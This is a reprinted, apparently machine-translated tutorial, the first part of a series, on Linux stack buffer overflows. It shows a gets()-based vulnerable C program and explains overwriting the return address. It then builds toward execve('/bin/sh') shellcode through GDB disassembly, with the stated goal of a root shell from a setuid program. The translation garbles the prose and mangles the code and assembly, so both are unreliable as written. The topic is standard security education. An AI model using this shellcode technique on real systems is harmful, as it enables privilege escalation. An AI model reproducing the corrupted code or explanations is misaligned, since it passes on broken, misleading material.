Stack Overflow technology from entry to advanced (1)

Stack Overflow technology from entry to advanced (1)

Reprinted by: Author: Self-waiting Source: IT expert network

Although overflow is inevitable in the Process of program development, it poses a huge threat to the system. Due to the particularity of the system, when overflow occurs, attackers can exploit this vulnerability to obtain the system's advanced permissions root. Therefore, this article will introduce the stack overflow technology in detail ......

Before you begin to understand stack overflow, you should first understand the Win32 assembly language and the register composition and functions. You must have basic knowledge about stack and storage allocation. There are many computer books related to this. I will simply elaborate on the principles and focus on applications. Next, you should understand Linux. In this lecture, our example will be developed on Linux.

1. First, review the basic knowledge.

Physically, a stack is a memory space allocated continuously. Various variables are declared in a program. Static global variables are located in the Data Segment and loaded when the program starts running. Dynamic local variables of the program are allocated to the stack.

In terms of operation, the stack is a queue that comes first and then goes out. The growth direction is the opposite to that of memory. We specify that the memory growth direction is up, and the stack growth direction is down. Stack Operation PUSH = ESP-4, the operation is pop = ESP + 4. In other words, the stack in the old value, its memory address, but greater than the new value. Keep this in mind, because this is the basic theoretical basis for Stack Overflow.

In the callback function call, the stack will be pushed in sequence: parameters, return address, and EBP. If a function has a local variable, the corresponding space is opened in the stack to construct the variable. When the function execution ends, the content of these local variables will be lost. But not cleared. When the function returns, the EBP is displayed, the stack is restored to the function call address, and the return address to the EIP is displayed to continue executing the program.

In C language programs, the parameter pressure stack order is reversed. For example, func (A, B, C ). When the parameter is added to the stack, It is C, B, and. When taking the parameters, because the stack first goes in and then out, take a at the top of the stack, then B, and finally take C. These are the basic knowledge of assembly language. You must understand these knowledge before you begin.

2. Now let's see what Stack Overflow is.

　　Stack allocation during runtime

Stack Overflow means that too much data is written to the data block regardless of the size of the data block in the stack, leading to data out of bounds, and the result overwrites the old stack data.

For example, program 1:

# Include Int main () { Char name [8]; Printf ("please type your name :"); Gets (name ); Printf ("Hello, % s! ", Name ); Return 0; }

Compile and execute. Input ipxodi to output hello and ipxodi !. How is the stack operated when the program is running?

When the main function starts to run, the stack will be placed in the return address and EBP in sequence.

We use gcc-s to obtain the Assembly Language Output. We can see that the beginning of the main function corresponds to the following statement:

Pushl % EBP Movl % ESP, % EBP Subl $8, % ESP

First, he saves the EBP, and then EBP is equal to the current ESP, so that EBP can be used to access the local variables of this function. After that, esp minus 8, that is, the stack increases by 8 bytes to store the name [] array. Finally, main returns. The address in RET is displayed and assigned to the EIP. The CPU continues to execute the command pointed to by the EIP.

　　Stack Overflow

Now let's run it again. Input ipxodiaaaaaaaaaaaaaaa. After gets (name) is executed, the name array cannot accommodate because the input name string is too long, you have to write 'A' to the top of the memory '. Because the stack growth direction is opposite to the memory growth direction, these 'A' overwrites the old elements of the stack. We can find that EBP and RET have been overwritten by 'A. When main returns, the 'aaa' ASCII code: 0x4141414141 is used as the return address. The CPU tries to execute the command at 0x41414141 and the result is incorrect. This is a stack overflow.

3. How to Use Stack Overflow

We have created a stack overflow. The principle can be summarized as follows: Because the string processing functions (gets, strcpy, and so on) do not monitor and limit the array out-of-bounds, we use the character array to write out-of-bounds and overwrite the value of the old element in the stack, you can modify the return address.

In the preceding example, this causes the CPU to access a non-existent command and the result is incorrect. In fact, when the stack overflows, we have completely controlled the next action of this program. If we overwrite the returned address with an actual instruction address, the CPU will execute our instruction instead.

In the Uinx/Linux system, our command can execute a shell, which will obtain the same permissions as the program that is overflows by our stack. If this program is set UID, we can get the root shell. The next section describes how to write a shell code.

 

　　How to Write a shell code

I. shellcode basic algorithm analysis

In the program, a shell program is written as follows:

Shellcode. c ------------------------------------------------------------------------ # Include Void main (){ Char * name [2]; Name [0] = "/bin/sh" Name [1] = NULL; Execve (name [0], name, null ); } ------------------------------------------------------------------------

The execve function will execute a program. He needs the program name address as the first parameter. A pointer array with content of argv [I] (argv [n-1] = 0) of the program serves as the second parameter, and (char *) 0 serves as the third parameter.

Let's take a look at execve's assembly code:

[Nkl10] $ content $ nbsp; gcc-O shellcode-static shellcode. c [Nkl10] $ content $ nbsp; GDB shellcode (GDB) disassemble _ execve Dump of worker er code for function _ execve: 0x80002bc <__execve>: pushl % EBP; 0x80002bd <__execve + 1>: movl % ESP, % EBP ; The above is the function header. 0x80002bf <__ execve + 3>: pushl % EBX ; Save EBX 0x80002c0 <__ execve + 4>: movl $ 0xb, % eax ; Eax = 0xb, and eax specifies the number of system calls. 0x80002c5 <__execve + 9>: movl 0x8 (% EBP), % EBX ; EBP + 8 is the first parameter "/bin/sh \ 0" 0x80002c8 <__execve + 12>: movl 0xc (% EBP), % ECx ; EBP + 12 is the address of the second parameter name Array 0x80002cb <__execve + 15>: movl 0x10 (% EBP), % edX ; EBP + 16 is the address of the third parameter NULL pointer. Name [2-1] is null, used to store the return value. 0x80002ce <__execve + 18>: int $0x80 Execve) 0x80002d0 <__ execve + 20>: movl % eax, % edX The processing of the returned values is useless. 0x80002d2 <__execve + 22>: testl % edX, % edX 0x80002d4 <__ execve + 24>: JNL 0x80002e6 <__ execve + 42> 0x80002d6 <__ execve + 26>: negl % edX 0x80002d8 <__ execve + 28>: pushl % edX 0x80002d9 <__ execve + 29>: Call 0x8001a34 <__Normal_errno_location> 0x80002de <__execve + 34>: popl % edX 0x80002df <__execve + 35>: movl % edX, (% eax) 0x80002e1 <__ execve + 37>: movl $0 xffffffff, % eax 0x80002e6 <__execve + 42>: popl % EBX 0x80002e7 <__execve + 43>: movl % EBP, % ESP 0x80002e9 <__ execve + 45>: popl % EBP 0x80002ea <__execve + 46>: Ret 0x80002eb <__execve + 47>: NOP End of worker er dump.

After the above analysis, we can get the following simplified command algorithm:

Movl $ execve system call number, % eax Movl "bin/sh \ 0" Address, % EBX Address of the movl name array, % ECx Movl name [n-1] address, % edX Int $0x80; execve)

After execve is successfully executed, the program shellcode will exit and/bin/sh will continue to be executed as a sub-process. However, if execve fails to be executed (for example, there is no/bin/sh file), the CPU will continue to execute subsequent commands and the results will not know where to go. Therefore, an exit () system call must be executed to end the execution of shellcode. C.

Let's take a look at the compilation code of exit (0:

(GDB) disassemble _ exit Dump of worker er code for function _ Exit: 0x800034c <_ exit>: pushl % EBP 0x800034d <_ exit + 1>: movl % ESP, % EBP 0x800034f <_ exit + 3>: pushl % EBX 0x8000350 <_ exit + 4>: movl $0x1, % eax; 1 system call 0x8000355 <_ exit + 9>: movl 0x8 (% EBP), % EBX; EBX is the parameter 0 0x8000358 <_ exit + 12>: int $0x80; triggers a system call. 0x800035a <_ exit + 14>: movl 0 xfffffffc (% EBP), % EBX 0x800035d <_ exit + 17>: movl % EBP, % ESP 0x800035f <_ exit + 19>: popl % EBP 0x8000360 <_ exit + 20>: Ret 0x8000361 <_ exit + 21>: NOP 0x8000362 <_ exit + 22>: NOP 0x8000363 <_ exit + 23>: NOP End of worker er dump.

It seems that the compilation code of exit (0) is simpler:

Movl $0x1, % eax; 1 system call Movl 0, % EBX; EBX is the exit parameter 0 Int $0x80; triggers system call

To sum up, the merged assembly code is:

Movl $ execve system call number, % eax Movl "bin/sh \ 0" Address, % EBX Address of the movl name array, % ECx Movl name [n-1] address, % edX Int $0x80; execve) Movl $0x1, % eax; 1 system call Movl 0, % EBX; EBX is the exit parameter 0 Int $0x80; Execute system call (Exit)